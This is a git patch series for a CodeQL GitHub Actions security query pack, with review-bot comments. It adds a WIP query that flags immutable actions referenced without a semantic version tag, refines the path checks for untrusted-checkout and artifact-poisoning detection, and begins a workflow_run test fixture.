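Review bot: Adding `octokit` to `isTrustedOrg` exempts every `octokit/*` action from the pinned-commit requirement, and the predicate has no QLDoc stating what qualifies an organisation for the list, so a reviewer of the next addition has nothing to check it against. I would record the criterion above the `bindingset[repo]` line, e.g. `/** Holds if repo belongs to an organisation maintained by GitHub; actions from these organisations are exempt from the commit-pinning requirement. */`. If the motivation is narrower than ownership (for instance that octokit/request-action is modelled as an immutable action in patch 597), the comment should say that instead, since the two justifications lead to different future additions.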
From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Thu, 17 Oct 2024 16:14:03 -0400 Subject: [PATCH 597/707] unversioned immutable actions wip --- ql/lib/codeql/actions/config/Config.qll | 11 ++++++ .../actions/config/ConfigExtensions.qll | 7 ++++ ql/lib/ext/config/immutable_actions.yml | 22 +++++++++++ .../CWE-829/UnversionedImmutableAction.md | 27 +++++++++++++ .../CWE-829/UnversionedImmutableAction.ql | 38 +++++++++++++++++++ 5 files changed, 105 insertions(+) create mode 100644 ql/lib/ext/config/immutable_actions.yml create mode 100644 ql/src/Security/CWE-829/UnversionedImmutableAction.md create mode 100644 ql/src/Security/CWE-829/UnversionedImmutableAction.ql diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index 82b7a53a9d7b..a439f9996239 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -119,6 +119,17 @@ predicate vulnerableActionsDataModel( Extensions::vulnerableActionsDataModel(action, vulnerable_version, vulnerable_sha, fixed_version) } +/** + * MaD models for vulnerable actions + * Fields: + * - action: action name + */ +predicate immutableActionsDataModel( + string action +) { + Extensions::immutableActionsDataModel(action) +} + /** * MaD models for untrusted git commands * Fields: diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/ql/lib/codeql/actions/config/ConfigExtensions.qll index a32e9c445f2d..c36ad046a3c5 100644 --- a/ql/lib/codeql/actions/config/ConfigExtensions.qll +++ b/ql/lib/codeql/actions/config/ConfigExtensions.qll @@ -58,6 +58,13 @@ extensible predicate vulnerableActionsDataModel( string action, string vulnerable_version, string vulnerable_sha, string fixed_version ); +/** + * Holds for actions that are known to be immutable. + */ +extensible predicate immutableActionsDataModel( + string action +); + /** * Holds for git commands that may introduce untrusted data when called on an attacker controlled branch. */ 
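Review bot: The single-parameter signature `predicate immutableActionsDataModel( string action ) {` in Config.qll is wrapped over three lines, which the neighbouring four-parameter `vulnerableActionsDataModel` needs but this one does not; the same wrapping appears in the `extensible predicate immutableActionsDataModel( string action );` hunk of ConfigExtensions.qll. `predicate immutableActionsDataModel(string action) { Extensions::immutableActionsDataModel(action) }` and `extensible predicate immutableActionsDataModel(string action);` are the usual one-line forms for short signatures. The copied header comment `MaD models for vulnerable actions` is corrected to "immutable actions" in patch 599, so I am not raising it here.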
diff --git a/ql/lib/ext/config/immutable_actions.yml b/ql/lib/ext/config/immutable_actions.yml new file mode 100644 index 000000000000..072e8ed0b099 --- /dev/null +++ b/ql/lib/ext/config/immutable_actions.yml @@ -0,0 +1,22 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: immutableActionsDataModel + data: + - ["actions/checkout"] + - ["actions/cache"] + - ["actions/setup-node"] + - ["actions/upload-artifact"] + - ["actions/setup-python"] + - ["actions/download-artifact"] + - ["actions/github-script"] + - ["actions/setup-java"] + - ["actions/setup-go"] + - ["actions/upload-pages-artifact"] + - ["actions/deploy-pages"] + - ["actions/setup-dotnet"] + - ["actions/stale"] + - ["actions/labeler"] + - ["actions/create-github-app-token"] + - ["actions/configure-pages"] + - ["octokit/request-action"] diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.md b/ql/src/Security/CWE-829/UnversionedImmutableAction.md new file mode 100644 index 000000000000..eab708f8602e --- /dev/null +++ b/ql/src/Security/CWE-829/UnversionedImmutableAction.md 
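Review bot: The new data file lists seventeen action names with no comment on how an entry qualifies or where the list comes from, yet as far as the series shows it is the only input to `immutableActionsDataModel` and therefore decides which `uses:` steps the new query reports. A header comment such as `# Actions published as Immutable Actions; source: <UPSTREAM-LIST-URL>, last reviewed <DATE>` (with the real reference filled in) would let maintainers verify additions and notice when the upstream list changes. The list also mixes a third-party organisation (`octokit/request-action`) with `actions/*` entries; if the inclusion of octokit is what motivated the trusted-org change in patch 596, stating that here ties the two together.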
@@ -0,0 +1,27 @@ +# Unpinned tag for 3rd party Action in workflow + +## Description + +Using a tag for a 3rd party Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack. + +## Recommendations + +Pinning an action to a full length commit SHA is currently the only way to use an action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork. + +## Examples + +### Incorrect Usage + +```yaml +- uses: tj-actions/changed-files@v44 +``` + +### Correct Usage + +```yaml +- uses: tj-actions/changed-files@c65cd883420fd2eb864698a825fc4162dd94482c # v44 +``` + +## References + +- [Using third-party actions](https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions#using-third-party-actions) diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.ql b/ql/src/Security/CWE-829/UnversionedImmutableAction.ql new file mode 100644 index 000000000000..d9a1394641fa --- /dev/null +++ b/ql/src/Security/CWE-829/UnversionedImmutableAction.ql 
@@ -0,0 +1,38 @@ +/** + * @name Unversioned Immutable Action + * @description Using an Immutable Action without a semantic version tag opts out of the protections of Immutable Action + * @kind problem + * @security-severity 5.0 + * @problem.severity recommendation + * @precision high + * @id actions/unversioned-immutable-action + * @tags security + * actions + * external/cwe/cwe-829 + */ + +import actions + +bindingset[version] +private predicate isSemanticVersioned(string version) { version.regexpMatch("^v[0-9]+(\\.[0-9]+)*(\\.[xX])?$") } + +bindingset[repo] +private predicate isTrustedOrg(string repo) { + exists(string org | org in ["actions", "github", "advanced-security", "octokit"] | repo.matches(org + "/%")) +} + +from UsesStep uses, string repo, string version, Workflow workflow, string name +where + uses.getCallee() = repo and + uses.getEnclosingWorkflow() = workflow and + ( + workflow.getName() = name + or + not exists(workflow.getName()) and workflow.getLocation().getFile().getBaseName() = name + ) and + uses.getVersion() = version and + not isTrustedOrg(repo) and + not isPinnedCommit(version) +select uses.getCalleeNode(), + "Unpinned 3rd party Action '" + name + "' step $@ uses '" + repo + "' with ref '" + version + + "', not a pinned commit hash", uses, uses.toString() From e5508343b197f0bca8dff57e5fe97f41d0bf31f9 Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Fri, 18 Oct 2024 15:21:33 -0400 Subject: [PATCH 598/707] update unpinned actions tag test --- .../query-tests/Security/CWE-829/UnpinnedActionsTag.expected | 3 --- 1 file changed, 3 deletions(-) diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index d05c7bebc07e..a9e5134b28ee 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
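Review bot: The `where` clause calls `isPinnedCommit`, which this file does not define — the only definition in the series is the `private predicate isPinnedCommit` in UnpinnedActionsTag.ql (patch 596), which is not importable — while the `isSemanticVersioned` predicate defined above it is never used and `immutableActionsDataModel` is not consulted at all, so this version of the query is unlikely to compile and does not implement what its `@description` states. The `select` message (`Unpinned 3rd party Action ... not a pinned commit hash`) and the help file added in the same commit (UnversionedImmutableAction.md, hunk `@@ -0,0 +1,27 @@` above) are both copied from UnpinnedActionsTag and recommend the opposite of this query's purpose: pinning to a commit SHA rather than using a semantic version tag. Patch 599 rewrites the query body, but the help file keeps the copied text within the visible series, so it still needs its own description, recommendation and example (`uses: actions/checkout@<sha>` versus `uses: actions/checkout@v4`) for immutable actions.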
@@ -10,9 +10,6 @@ | .github/workflows/issue_comment_3rd_party_action.yml:14:15:14:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:27:15:27:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:41:15:41:42 | eficode/resolve-pr-refs@main | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | -| .github/workflows/issue_comment_octokit.yml:13:15:13:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | -| .github/workflows/issue_comment_octokit.yml:20:15:20:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | -| .github/workflows/issue_comment_octokit.yml:104:15:104:43 | octokit/request-action@v2.0.2 | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash 
| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | | .github/workflows/label_trusted_checkout.yml:20:13:20:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout.yml:24:13:24:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | | .github/workflows/level0.yml:36:15:36:47 | rlespinasse/github-slug-action@v4 | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | From 2d5cd1a61a978417e8c20cf13febd4680823be97 Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Fri, 18 Oct 2024 16:51:31 -0400 Subject: [PATCH 599/707] WIP. todo: modify help text in query to be helpful, write qlhelp file, find out how to not release to customers --- ql/lib/codeql/actions/config/Config.qll | 2 +- .../UseOfUnversionedImmutableAction.qll | 11 +++++++ .../CWE-829/UnversionedImmutableAction.ql | 29 ++++--------------- .../actions/dangerous-git-checkout/action.yml | 2 +- .../UnversionedImmutableAction.expected | 19 ++++++++++++ .../CWE-829/UnversionedImmutableAction.qlref | 1 + 6 files changed, 38 insertions(+), 26 deletions(-) create mode 100644 ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll create mode 100644 ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected create mode 100644 ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref 
diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index a439f9996239..a21f3e358d13 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -120,7 +120,7 @@ predicate vulnerableActionsDataModel( } /** - * MaD models for vulnerable actions + * MaD models for immutable actions * Fields: * - action: action name */ diff --git a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll new file mode 100644 index 000000000000..2be71612f26e --- /dev/null +++ b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll @@ -0,0 +1,11 @@ +import actions + +class UnversionedImmutableAction extends UsesStep { + string immutable_action; + + UnversionedImmutableAction() { + immutableActionsDataModel(immutable_action) and + this.getCallee() = immutable_action and + not this.getVersion().regexpMatch("^(v)?[0-9]+(\\.[0-9]+)*(\\.[xX])?$") + } +} diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.ql b/ql/src/Security/CWE-829/UnversionedImmutableAction.ql index d9a1394641fa..0c6443bc3e64 100644 --- a/ql/src/Security/CWE-829/UnversionedImmutableAction.ql +++ b/ql/src/Security/CWE-829/UnversionedImmutableAction.ql @@ -2,7 +2,6 @@ * @name Unversioned Immutable Action * @description Using an Immutable Action without a semantic version tag opts out of the protections of Immutable Action * @kind problem - * @security-severity 5.0 * @problem.severity recommendation * @precision high * @id actions/unversioned-immutable-action 
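Review bot: `UnversionedImmutableAction` has no QLDoc and its regex `^(v)?[0-9]+(\\.[0-9]+)*(\\.[xX])?$` is unexplained, so the accepted tag forms (`4`, `v4`, `v4.1.0`, `v2.x`) and the deliberate consequence that a full commit SHA is reported as unversioned are recorded nowhere — that consequence matters because the help file added in patch 597 tells users to pin to a SHA, which is exactly what this class then flags. A class comment along the lines of `/** A uses: step that references an action listed in immutableActionsDataModel by a ref other than a semantic version tag (N, vN, vN.N.N, vN.x); branch names and commit SHAs are reported, since immutable-action guarantees only apply to tagged versions. */` would capture both. `this.getCallee() = immutable_action` is also an exact string comparison; GitHub matches `uses:` owner and repository names case-insensitively, so a reference such as `Actions/checkout` would fall outside the model unless `getCallee()` already lower-cases — worth confirming.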
@@ -12,27 +11,9 @@ */ import actions +import codeql.actions.security.UseOfUnversionedImmutableAction -bindingset[version] -private predicate isSemanticVersioned(string version) { version.regexpMatch("^v[0-9]+(\\.[0-9]+)*(\\.[xX])?$") } - -bindingset[repo] -private predicate isTrustedOrg(string repo) { - exists(string org | org in ["actions", "github", "advanced-security", "octokit"] | repo.matches(org + "/%")) -} - -from UsesStep uses, string repo, string version, Workflow workflow, string name -where - uses.getCallee() = repo and - uses.getEnclosingWorkflow() = workflow and - ( - workflow.getName() = name - or - not exists(workflow.getName()) and workflow.getLocation().getFile().getBaseName() = name - ) and - uses.getVersion() = version and - not isTrustedOrg(repo) and - not isPinnedCommit(version) -select uses.getCalleeNode(), - "Unpinned 3rd party Action '" + name + "' step $@ uses '" + repo + "' with ref '" + version + - "', not a pinned commit hash", uses, uses.toString() +from UnversionedImmutableAction step +select step, + "The workflow is using an immutable action ($@) without versinoning so it doesn't work", step, + step.getCallee() \ No newline at end of file diff --git a/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml b/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml index 57058e7a076f..cd4f0fe660aa 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml @@ -4,7 +4,7 @@ runs: using: "composite" steps: - name: Checkout repo - uses: actions/checkout@v4 + uses: actions/checkout@4 with: ref: ${{ github.event.pull_request.head.sha }} fetch-depth: 2 
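Review bot: The new `select` message `"The workflow is using an immutable action ($@) without versinoning so it doesn't work"` misspells "versioning" and does not say what the user should do, and the same string is baked into all nineteen rows of the `.expected` file added in this commit, so fixing it later means regenerating those too. Something like `"Immutable action $@ is referenced without a semantic version tag, so the immutable-actions protections do not apply; use a tag such as v4 or v4.1.0."` states both the problem and the fix; the commit description already flags the message as a todo, so this is one concrete option. The file also loses its trailing newline (`\ No newline at end of file`), which the previous version had.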
diff --git a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected new file mode 100644 index 000000000000..5ae46862fb43 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected 
@@ -0,0 +1,19 @@ +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | actions/github-script | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | actions/github-script | +| .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | actions/checkout | +| .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | actions/checkout | +| .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | actions/checkout | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | actions/checkout | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:30:9:36:6 | Uses Step | actions/checkout | +| .github/workflows/poc.yml:36:9:38:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:36:9:38:6 | Uses Step | actions/configure-pages | +| .github/workflows/poc.yml:43:9:47:2 | Uses Step | The workflow is using an 
immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:43:9:47:2 | Uses Step | actions/upload-pages-artifact | +| .github/workflows/poc.yml:59:9:63:26 | Uses Step: deployment | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:59:9:63:26 | Uses Step: deployment | actions/deploy-pages | +| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | actions/checkout | +| .github/workflows/test8.yml:20:9:26:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test8.yml:20:9:26:6 | Uses Step | actions/checkout | +| .github/workflows/test9.yml:11:9:16:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test9.yml:11:9:16:6 | Uses Step | actions/checkout | +| .github/workflows/test11.yml:84:7:90:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test11.yml:84:7:90:4 | Uses Step | actions/checkout | +| .github/workflows/test12.yml:86:7:92:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test12.yml:86:7:92:4 | Uses Step | actions/checkout | +| .github/workflows/test14.yml:101:7:105:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test14.yml:101:7:105:4 | Uses Step | actions/checkout | +| .github/workflows/test14.yml:105:7:111:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test14.yml:105:7:111:4 | Uses Step | actions/checkout | +| .github/workflows/test15.yml:60:7:65:4 | Uses Step | 
The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test15.yml:60:7:65:4 | Uses Step | actions/checkout | +| .github/workflows/test15.yml:110:7:115:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test15.yml:110:7:115:4 | Uses Step | actions/checkout | diff --git a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref new file mode 100644 index 000000000000..6ce4123fa5ed --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref @@ -0,0 +1 @@ +Security/CWE-829/UnversionedImmutableAction.ql \ No newline at end of file From e03ba558129fbf8de923df7b3d17b54a6fcc639d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 19 Oct 2024 17:01:29 +0200 Subject: [PATCH 600/707] Account for checkout path on Untrusted Checkout Critical --- .../security/ArtifactPoisoningQuery.qll | 7 +- .../actions/security/PoisonableSteps.qll | 2 + .../CWE-829/UntrustedCheckoutCritical.ql | 33 +- .../CWE-829/.github/workflows/test16.yml | 294 ++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 18 ++ 5 files changed, 347 insertions(+), 7 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 9355462962d5..48bca0e46f95 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll 
@@ -276,7 +276,12 @@ class ArtifactPoisoningSink extends DataFlow::Node {
 )
 or
 poisonable.(UsesStep) = this.asExpr() and
- download.getPath() = "GITHUB_WORKSPACE/"
+ (
+ not poisonable instanceof LocalActionUsesStep and
+ download.getPath() = "GITHUB_WORKSPACE/"
+ or
+ isSubpath(poisonable.(LocalActionUsesStep).getPath(), download.getPath())
+ )
 )
 }
diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll
index 5e62aa675eeb..99d844bae79e 100644
--- a/ql/lib/codeql/actions/security/PoisonableSteps.qll
+++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll
@@ -49,4 +49,6 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run {
 class LocalActionUsesStep extends PoisonableStep, UsesStep {
 LocalActionUsesStep() { this.getCallee().matches("./%") }
+
+ string getPath() { result = normalizePath(this.getCallee()) }
 }
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
index 37628a29489a..4b87ad00c0f4 100644
--- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
+++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
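Review bot: The new disjunction (`not poisonable instanceof LocalActionUsesStep and download.getPath() = "GITHUB_WORKSPACE/" or isSubpath(poisonable.(LocalActionUsesStep).getPath(), download.getPath())`) is repeated verbatim in this commit's UntrustedCheckoutCritical.ql hunk with `checkout.getPath()` in place of `download.getPath()`, so the two path heuristics will drift the next time one of them is refined. A single predicate on `PoisonableStep` taking the candidate path, e.g. `predicate readsFromPath(string path)`, holding both the `Run` and the `UsesStep` cases, would let both queries share one definition. The `"GITHUB_WORKSPACE/"` literal likewise appears in both places and would be better kept next to whatever produces that rooted form (presumably `normalizePath`, which is not visible here). The enclosing characteristic predicate of `ArtifactPoisoningSink` starts outside the hunk.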
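Review bot: The new `getPath()` member of `LocalActionUsesStep` has no QLDoc although both queries touched in this commit now feed it into `isSubpath`; a one-line doc such as `/** Gets the path of the local action this step runs: its `./`-prefixed callee passed through `normalizePath`. */` would state the contract. Whether `normalizePath` drops the leading `./` and yields the same `GITHUB_WORKSPACE/`-rooted form that `checkout.getPath()` and `download.getPath()` are compared against cannot be seen from this hunk; that is worth confirming, because `isSubpath` only says something if both sides share the same root.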
@@ -20,12 +20,33 @@ import codeql.actions.security.ControlChecks
 query predicate edges(Step a, Step b) { a.getNextStep() = b }
-from PRHeadCheckoutStep checkout, PoisonableStep step, Event event
+from PRHeadCheckoutStep checkout, PoisonableStep poisonable, Event event
 where
 // the checkout is followed by a known poisonable step
- checkout.getAFollowingStep() = step and
+ checkout.getAFollowingStep() = poisonable and
+ (
+ poisonable instanceof Run and
+ (
+ // Check if the poisonable step is a local script execution step
+ // and the path of the command or script matches the path of the downloaded artifact
+ isSubpath(poisonable.(LocalScriptExecutionRunStep).getPath(), checkout.getPath())
+ or
+ // Checking the path for non local script execution steps is very difficult
+ not poisonable instanceof LocalScriptExecutionRunStep
+ // Its not easy to extract the path from a non-local script execution step so skipping this check for now
+ // and isSubpath(poisonable.(Run).getWorkingDirectory(), checkout.getPath())
+ )
+ or
+ poisonable instanceof UsesStep and
+ (
+ not poisonable instanceof LocalActionUsesStep and
+ checkout.getPath() = "GITHUB_WORKSPACE/"
+ or
+ isSubpath(poisonable.(LocalActionUsesStep).getPath(), checkout.getPath())
+ )
+ ) and
 // the checkout occurs in a privileged context
- inPrivilegedContext(step, event) and
- not exists(ControlCheck check | check.protects(step, event, "untrusted-checkout"))
-select step, checkout, step, "Execution of untrusted code on a privileged workflow. $@", event,
- event.getLocation().getFile().toString()
+ inPrivilegedContext(poisonable, event) and
+ not exists(ControlCheck check | check.protects(poisonable, event, "untrusted-checkout"))
+select poisonable, checkout, poisonable, "Execution of untrusted code on a privileged workflow. $@",
+ event, event.getLocation().getFile().toString()
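Review bot: The comment above the `LocalScriptExecutionRunStep` branch says the script path is matched against "the path of the downloaded artifact", but this query compares against `checkout.getPath()`, the directory the PR head was checked out into; the wording was carried over from the artifact-poisoning query and now misdescribes the check. Suggest `// Check if the poisonable step is a local script execution step whose script lives under the checkout path`. Further down, `// Its not easy to extract the path` should read `// It's not easy to extract the path`. It may also be worth a comment that a `PoisonableStep` which is neither `Run` nor `UsesStep`, if any such class exists, is now excluded by the added disjunction, since that was not the case before.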
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml new file mode 100644 index 000000000000..4ceb9a4c72ff --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml 
@@ -0,0 +1,294 @@ +name: Post-Build +run-name: Post-Build on ${{ github.event.workflow_run.head_branch }} +on: + workflow_run: + types: [ 'completed' ] + workflows: + - Build +concurrency: + # Cancel concurrent jobs on pull_request but not push, by including the run_id in the concurrency group for the latter. + group: post-build-${{ github.event.workflow_run.event == 'push' && github.run_id || 'pr' }}-${{ github.event.workflow_run.head_branch }} + cancel-in-progress: true + +env: + COMPOSER_ROOT_VERSION: "dev-trunk" + SUMMARY: Post-Build run [#${{ github.run_id }}](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}) for Build run [#${{ github.event.workflow_run.id }}](${{ github.event.workflow_run.html_url }}) + +permissions: + actions: read + contents: read + pull-requests: read + +# Note the job logic here is a bit unusual. That's because this workflow is triggered by `workflow_run`, and so is not shown on the PR by default. +# Instead we have to manually report back, including where we could normally just skip or let a failure be handled. +# - If the "Build" job failed, we need to set our status as failed too (build_failed). +# - If the find_artifact job fails for some reason, we need a step to explicitly report that back. +# - If no plugins are found, we need to explicitly report back a "skipped" status. +# - And the upgrade_test job both explicitly sets "in progress" at its start and updates at its end. +# +# If you're wanting to add a new check, you'd want to do the following: +# - Add a step in the `setup` workflow to create your check, and a corresponding output for later steps to have the ID. +# - Add a step in the `build_failed` workflow to set your run to cancelled. +# - Add a job to run whatever tests you need to run, with steps similar to the `upgrade_test` workflow's "Get token", "Notify check in progress", and "Notify final status". 
+# - Add a step in the `no_plugins` workflow to set your run to skipped if your job only runs when there are plugins built. + +jobs: + setup: + name: Setup + runs-on: ubuntu-latest + timeout-minutes: 2 # 2022-12-20: Seems like it should be fast. + outputs: + upgrade_check: ${{ steps.upgrade_check.outputs.id }} + steps: + - name: Log info + run: | + echo "$SUMMARY" >> $GITHUB_STEP_SUMMARY + + - uses: actions/checkout@v4 + + - name: Get token + id: get_token + uses: ./.github/actions/gh-app-token + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + + - name: 'Create "Test plugin upgrades" check' + id: upgrade_check + uses: ./.github/actions/check-run + with: + name: Test plugin upgrades + sha: ${{ github.event.workflow_run.head_sha }} + status: queued + title: Test queued... + summary: | + ${{ env.SUMMARY }} + token: ${{ steps.get_token.outputs.token }} + + build_failed: + name: Handle build failure + runs-on: ubuntu-latest + needs: setup + if: github.event.workflow_run.conclusion != 'success' + timeout-minutes: 2 # 2022-08-26: Seems like it should be fast. + steps: + - uses: actions/checkout@v4 + + - name: Get token + id: get_token + uses: ./.github/actions/gh-app-token + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + + - name: 'Mark "Test plugin upgrades" cancelled' + uses: ./.github/actions/check-run + with: + id: ${{ needs.setup.outputs.upgrade_check }} + conclusion: cancelled + title: Build failed + summary: | + ${{ env.SUMMARY }} + + Post-build run aborted because the build did not succeed. + token: ${{ steps.get_token.outputs.token }} + + find_artifact: + name: Find artifact + runs-on: ubuntu-latest + needs: setup + if: github.event.workflow_run.conclusion == 'success' + timeout-minutes: 2 # 2022-08-26: Seems like it should be fast. 
